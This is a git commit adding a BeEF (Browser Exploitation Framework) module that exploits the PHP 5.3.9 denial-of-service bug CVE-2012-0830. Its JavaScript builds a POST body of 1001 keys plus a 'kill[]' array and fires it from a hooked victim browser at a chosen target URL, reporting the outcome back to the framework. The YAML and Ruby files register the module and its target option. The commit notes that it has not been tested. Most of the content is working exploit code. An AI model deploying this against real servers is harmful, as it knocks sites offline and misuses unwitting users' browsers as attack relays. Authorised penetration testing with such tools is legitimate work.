Add PHP 5.3.9 DoS (CVE-2012-0830) module

Has not been tested
2012-11-29 18:34:07 +10:30
parent 9083586135
commit 75532ffe44
3 changed files with 88 additions and 0 deletions
--- a/modules/exploits/php-5.3.9-dos/command.js
+++ b/modules/exploits/php-5.3.9-dos/command.js
@@ -0,0 +1,52 @@
+//
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+// Simple proof of concept for PHP 5.3.9 DoS bug (CVE-2012-0830)
+// PoC written by Paul Westin
+// PoC ported to BeEF by bcoles
+// Bug discovered by Stefan Esser (@i0n1c)
+// For more information see http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/
+
+// Generate 1000 normal keys and one array
+function createEvilObj () {
+    var evil_obj = {};
+    for (var i = 0; i < 1001; i++) {
+        evil_obj[i] = 1;
+    }
+    evil_obj['kill[]'] = 'kill';
+    return evil_obj;
+}
+
+// Serialize Javascript object into POST data
+function serializeObj (obj) {
+    var str = [];
+    for(var p in obj) {
+        str.push(p + "=" + obj[p]);
+    }
+    return str.join("&");
+}
+
+// Run attack
+function attackSite (target_url) {
+    var bad = serializeObj(createEvilObj());
+    var xhr = new XMLHttpRequest();
+    xhr.open("POST", target_url, true);
+    xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
+    xhr.setRequestHeader('Content-Length', bad.length);
+    xhr.send(bad);
+}
+
+try {
+    attackSite("<%= @url %>");
+    beef.net.send('<%= @command_url %>', <%= @command_id %>, "result=request sent");
+} catch (e) {
+    beef.net.send('<%= @command_url %>', <%= @command_id %>, "result=request failed&error="+e.toString());
+}
+
+});
+
--- a/modules/exploits/php-5.3.9-dos/config.yaml
+++ b/modules/exploits/php-5.3.9-dos/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        php_dos:
+            enable: true
+            category: "Exploits"
+            name: "PHP 5.3.9 DoS"
+            description: "This module uses the zombie browser to exploit a denial of service bug in PHP 5.3.9 (<a href='http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0830'>CVE-2012-0830</a>).<br/><br/>For more information, see <a href='http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/'>http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/</a>."
+            authors: ["bcoles", "Paul Westin", "Stefan Esser"]
+            target:
+                unknown: ["ALL"]
--- a/modules/exploits/php-5.3.9-dos/module.rb
+++ b/modules/exploits/php-5.3.9-dos/module.rb
@@ -0,0 +1,21 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Php_dos < BeEF::Core::Command
+
+	def self.options
+		return [
+			{'name' => 'url', 'ui_label' => 'Target URL', 'type' => 'textarea', 'value' =>'http://example.com/index.php', 'width' => '400px', 'height' => '50px'}
+		]
+	end
+
+	def post_execute
+		content = {}
+		content['result'] = @datastore['result']
+		save content
+	end
+
+end
+